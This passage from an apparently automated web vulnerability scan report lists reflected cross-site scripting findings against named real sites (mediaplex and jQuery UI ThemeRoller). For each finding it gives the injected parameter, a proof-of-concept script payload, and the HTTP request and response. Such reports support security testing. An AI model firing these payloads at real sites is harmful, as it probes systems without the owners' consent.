HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:45 GMT Server: Apache Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT ETag: "36e97-a5f-45a537df77f40" Accept-Ranges: bytes Content-Length: 3014 Content-Type: application/x-javascript var mp_swver = 0; var mp_html = ""; if( navigator.mimeTypes && navigator.mimeTypes[ if( na ...[SNIP]... <a href=\"http://altfarm ...[SNIP]... |
3.517. http://img.mediaplex.com/cgi-bin/html/0/7440/MT_300x250_8428_watermelonnew.js [mpvc parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://img.mediaplex.com |
Path: | /cgi-bin/html/0/7440/MT |
Issue detail
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ca6f3"%3balert(1)/This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.Request
GET /cgi-bin/html/0/7440/MT Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.pogo.com/ Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=517004695355 |
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:22:55 GMT Server: Apache Last-Modified: Tue, 28 Oct 2008 17:22:29 GMT ETag: "36e97-a5f-45a537df77f40" Accept-Ranges: bytes Content-Length: 3006 Content-Type: application/x-javascript var mp_swver = 0; var mp_html = ""; if( navigator.mimeTypes && navigator.mimeTypes[ if( na ...[SNIP]... <PARAM NAME=FlashVars VALUE=\"clickTAG=ca6f3";alert(1)/ ...[SNIP]... |
3.518. http://jqueryui.com/themeroller/ [bgColorActive parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgColorActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10928"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:41 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... lt=d3d3d3&fcDefault ...[SNIP]... |
3.519. http://jqueryui.com/themeroller/ [bgColorContent parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d4e2"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... l&fsDefault=1.1em ...[SNIP]... |
3.520. http://jqueryui.com/themeroller/ [bgColorDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b195c"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:35 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... fcHeader=222222 ...[SNIP]... |
3.521. http://jqueryui.com/themeroller/ [bgColorHeader parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1e489"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:28 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
3.522. http://jqueryui.com/themeroller/ [bgColorHover parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3461"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... cContent=222222 ...[SNIP]... |
3.523. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70b06"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ccc&bgTextureHeader=03 ...[SNIP]... |
3.524. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 412a9"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... =ffffff&bgTextureContent ...[SNIP]... |
3.525. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6733"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... /parseTheme.css.php?ctl ...[SNIP]... |
3.526. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e781b"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:39 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... fault=e6e6e6&bgTextu ...[SNIP]... |
3.527. http://jqueryui.com/themeroller/ [bgTextureActive parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88dc1"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:42 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... onColorDefault=888888 ...[SNIP]... |
3.528. http://jqueryui.com/themeroller/ [bgTextureContent parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgTextureContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba767"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:32 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... s=4px&bgColorHeader ...[SNIP]... |
3.529. http://jqueryui.com/themeroller/ [bgTextureDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgTextureDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ccc3"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:36 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... r=222222&bgColorContent ...[SNIP]... |
3.530. http://jqueryui.com/themeroller/ [bgTextureHeader parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgTextureHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84ac1"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:29 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120001 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... href="/themeroller/css ...[SNIP]... |
3.531. http://jqueryui.com/themeroller/ [bgTextureHover parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the bgTextureHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af6f9"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:38 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120001 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... tent=222222&bgColorD ...[SNIP]... |
3.532. http://jqueryui.com/themeroller/ [borderColorContent parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the borderColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 903d0"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:33 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120064 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... hlight_soft.png ...[SNIP]... |
3.533. http://jqueryui.com/themeroller/ [borderColorDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the borderColorDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1346"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... 1_flat.png&bgImgOpac ...[SNIP]... |
3.534. http://jqueryui.com/themeroller/ [borderColorHeader parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the borderColorHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d68b"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:30 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... hemeroller&ffDefault ...[SNIP]... |
3.535. http://jqueryui.com/themeroller/ [borderColorHover parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the borderColorHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acfb0"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... fault=02_glass.png ...[SNIP]... |
3.536. http://jqueryui.com/themeroller/ [cornerRadius parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f528"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
3.537. http://jqueryui.com/themeroller/ [fcContent parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54a2d"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:34 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... gImgOpacityHeader=75 ...[SNIP]... |
3.538. http://jqueryui.com/themeroller/ [fcDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 173b0"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:37 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... pacityContent=75 ...[SNIP]... |
3.539. http://jqueryui.com/themeroller/ [fcHeader parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e4b"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:31 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... ault=Verdana,Arial,sans ...[SNIP]... |
3.540. http://jqueryui.com/themeroller/ [fcHover parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the fcHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c90a7"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:40 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... png&bgImgOpacityDefault ...[SNIP]... |
3.541. http://jqueryui.com/themeroller/ [ffDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the ffDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f591"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
3.542. http://jqueryui.com/themeroller/ [fsDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the fsDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e6dad"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:27 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www4 X-Proxy: 2 Content-Length: 120067 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
3.543. http://jqueryui.com/themeroller/ [fwDefault parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the fwDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c205d"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
HTTP/1.1 200 OK Server: nginx/0.7.62 Date: Sun, 09 Jan 2011 02:22:26 GMT Content-Type: text/html Connection: close X-Powered-By: PHP/5.2.4-2ubuntu5.10 X-Served-By: www3 X-Proxy: 2 Content-Length: 120002 <!DOCTYPE html> <html> <head> <meta charset="UTF-8" /> <title>jQuery UI - ThemeRoller</title> <meta name="keywords" content="jquery,user interface,ui,widgets <meta nam ...[SNIP]... <link rel="stylesheet" href="/themeroller/css ...[SNIP]... |
3.544. http://jqueryui.com/themeroller/ [iconColorContent parameter] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://jqueryui.com |
Path: | /themeroller/ |
Issue detail
The value of the iconColorContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14675"><script>alert(1)<This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /themeroller/?ffDefault Host: jqueryui.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
Response
